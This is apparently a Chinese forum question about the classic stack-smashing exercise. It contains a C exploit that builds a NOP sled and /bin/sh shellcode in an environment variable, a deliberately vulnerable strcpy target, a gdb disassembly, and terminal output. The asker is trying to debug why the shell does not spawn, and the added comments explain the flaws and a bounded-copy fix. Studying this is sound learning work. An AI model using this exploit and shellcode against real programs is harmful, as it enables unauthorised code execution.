我试图使缓冲区溢出并运行shellcode以执行 /bin/sh
对于我们的缓冲区大小,一个不错的选择是比我们尝试溢出的缓冲区大约多100个字节。这会把我们的代码放在目标缓冲区末尾附近,为NOP留出很多空间,同时仍然用我们猜测的地址覆盖返回地址。我们尝试溢出的缓冲区长512个字节,因此我们将使用612。
exploit3.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Offset subtracted from this process's stack pointer to form the guessed address. */
#define DEFAULT_OFFSET 0
/* Default payload size; the run shown on this page passes 612 on the command line. */
#define DEFAULT_BUFFER_SIZE 512
/* Single-byte x86 no-op used to fill the sled in front of the shellcode. */
#define NOP 0x90

/* 32-bit x86 machine code followed by the path string it executes.
 * Kept verbatim from the page; not annotated byte by byte. */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer.
 * There is no return statement: the function relies on the asm leaving the
 * value in %eax, the register the 32-bit calling convention uses for return
 * values. Falling off the end of a non-void function and then using the
 * result is undefined behaviour in C, so an optimizing compiler is free to
 * break this. The asm is also 32-bit-only (%esp/%eax). */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

/* Builds the payload in a heap buffer, publishes it as the environment
 * variable EGG, and starts a child shell so the payload can be handed to the
 * target as $EGG (the `./vulnerable $EGG` run shown on this page).
 *
 * argv[1]: payload size in bytes (default DEFAULT_BUFFER_SIZE)
 * argv[2]: offset subtracted from the stack pointer (default DEFAULT_OFFSET)
 *
 * `void main` is non-standard; main should return int. Both atoi() calls are
 * unchecked: a non-numeric argument yields 0, and with bsize == 0 the
 * `buff[bsize - 1]` store below writes before the allocation (if malloc(0)
 * returns a non-null pointer). A bsize smaller than strlen(shellcode) also
 * makes the shellcode copy run outside the buffer. */
void main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0); /* reports success (status 0) although this is a failure path */
    }

    /* Guessed location of the payload in the target's stack: this process's
     * own stack pointer minus the offset. The guess only holds if the target
     * process is laid out the same way as this one. */
    addr = get_sp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* Fill the whole buffer with the guessed address. The loop advances i by 4
     * but addr_ptr by one long, so it assumes sizeof(long) == 4, and it writes
     * past the end of buff whenever bsize is not a multiple of 4. */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    /* First half of the buffer becomes the NOP sled. */
    for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

    /* The shellcode is placed so it ends around the middle of the buffer; the
     * second half keeps the address values written above. */
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* Terminate so the buffer is a valid C string for putenv(). */
    buff[bsize - 1] = '\0';

    /* Overwrite the first four bytes with the variable name. putenv() keeps a
     * pointer to buff rather than copying it, so buff must stay allocated. */
    memcpy(buff,"EGG=",4);
    putenv(buff);

    /* The child shell inherits EGG; this is why the payload is available as
     * $EGG in the next command typed at the new prompt. */
    system("/bin/bash");
}
vulnerable.c
#include <unistd.h>
#include <string.h>

/* Deliberately vulnerable target: copies argv[1] into a fixed 512-byte stack
 * buffer with strcpy(), which has no length bound. An argument longer than
 * the buffer overwrites whatever the compiler placed above xbuff in the
 * frame; in the disassembly on this page xbuff is at -0x208(%ebp) and the
 * saved %ecx that the epilogue uses to restore %esp is at -0x4(%ebp).
 * The defensive fix is a bounded copy that reports truncation, e.g.
 * snprintf(xbuff, sizeof xbuff, "%s", argv[1]) with its return value checked. */
int main(int argc, char *argv[]) {
    char xbuff[512];

    if(argc >1) strcpy(xbuff, argv[1]);

    return 0;
}
main 函数的汇编代码
(gdb) disass main
Dump of assembler code for function main:
   0x0804840b <+0>:  lea 0x4(%esp),%ecx
   0x0804840f <+4>:  and $0xfffffff0,%esp
   0x08048412 <+7>:  pushl -0x4(%ecx)
   0x08048415 <+10>: push %ebp
   0x08048416 <+11>: mov %esp,%ebp
   0x08048418 <+13>: push %ecx
   0x08048419 <+14>: sub $0x204,%esp
   0x0804841f <+20>: mov %ecx,%eax
   0x08048421 <+22>: cmpl $0x1,(%eax)
   0x08048424 <+25>: jle 0x8048441 <main+54>
   0x08048426 <+27>: mov 0x4(%eax),%eax
   0x08048429 <+30>: add $0x4,%eax
   0x0804842c <+33>: mov (%eax),%eax
   0x0804842e <+35>: sub $0x8,%esp
   0x08048431 <+38>: push %eax
   0x08048432 <+39>: lea -0x208(%ebp),%eax
   0x08048438 <+45>: push %eax
   0x08048439 <+46>: call 0x80482e0 <strcpy@plt>
   0x0804843e <+51>: add $0x10,%esp
   0x08048441 <+54>: mov $0x0,%eax
   0x08048446 <+59>: mov -0x4(%ebp),%ecx
   0x08048449 <+62>: leave
   0x0804844a <+63>: lea -0x4(%ecx),%esp
   0x0804844d <+66>: ret
End of assembler dump.
程序已执行,但并没有启动 /bin/sh:
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$
预期输出是:
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$ exit
[aleph1]$
问题出在哪里?!
第二个问题
:exploit3.c 的 main() 为什么在最后运行 system("/bin/bash")?...
exploit3
在最后运行一个shell,因为它在这里